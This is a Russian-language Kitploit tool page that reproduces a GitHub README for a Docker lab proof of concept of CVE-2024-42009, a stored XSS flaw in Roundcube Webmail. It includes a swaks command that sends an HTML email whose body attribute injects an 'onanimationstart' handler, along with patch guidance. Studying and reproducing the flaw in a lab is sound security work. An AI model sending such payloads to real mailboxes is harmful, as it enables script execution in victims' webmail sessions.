Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-42009 | Kitploit
Инструменты/GitHubGitHub/zaidarif47/cve-2024-42009
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHubzaidarif47/cve-2024-42009

CVE-2024-42009

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-42009 – Roundcube Stored XSS (Docker PoC)

📌 Обзор

В этом репозитории представлена рабочая Proof-of-Concept (PoC) для CVE-2024-42009 — уязвимости хранимого межсайтового скриптинга (XSS) в Roundcube Webmail.

Уязвимость вызвана некорректной санитизацией HTML с последующей небезопасной повторной обработкой атрибутов, что позволяет злоумышленникам внедрять вредоносные обработчики событий через специально сформированные HTML-письма.


⚠️ Затронутые версии

  • Roundcube ≤ 1.5.7
  • Roundcube ≤ 1.6.7

🧠 Сводка по уязвимости

Roundcube очищает входящие HTML-письма, но позднее повторно обрабатывает определённые атрибуты (например, bgcolor, некорректно сформированные атрибуты), что приводит к:

  • Путанице с границами атрибутов
  • Внедрению новых атрибутов
  • Повторному появлению опасных обработчиков событий (например, onanimationstart)

Это позволяет выполнить произвольный JavaScript, когда жертва открывает вредоносное письмо.


🐳 Настройка окружения (Docker)

1. Клонируйте репозиторий

root@kitploit:~
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC

2. Запустите уязвимый лабораторный стенд

root@kitploit:~
docker compose up -d

⏳ Подождите ~10–15 секунд, пока инициализируется почтовый сервер.


3. Создайте тестовых пользователей

root@kitploit:~
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'

4. Откройте Roundcube

root@kitploit:~
http://localhost:8080

Учётные данные:

  • [email protected] / victim123
  • [email protected] / attacker123

💣 Эксплуатация

Отправьте вредоносное письмо с помощью инструмента swaks:

root@kitploit:~
swaks --to [email protected] \
      --from [email protected] \
      --server localhost:2525 \
      --header "Content-Type: text/html; charset=utf-8" \
      --header "Subject: CVE-2024-42009 PoC" \
      --body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'

📸 Подтверждение концепции

  1. Войдите в учётную запись жертвы в Roundcube
  2. Откройте папку входящих сообщений
  3. Выполняется JavaScript (появляется alert)

1. Вредоносное письмо доставлено

Step 1

2. XSS сработал

Step 3


🛡️ Меры по устранению

Обновитесь до исправленных версий:

  • Roundcube ≥ 1.6.8
  • Roundcube ≥ 1.5.8

📚 Ссылки

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-42009
  • Sonarsource: https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009

⚖️ Отказ от ответственности

Этот проект предназначен только для образовательных целей и санкционированных исследований в области безопасности. Не используйте его против систем без соответствующего разрешения.


Скачать инструмент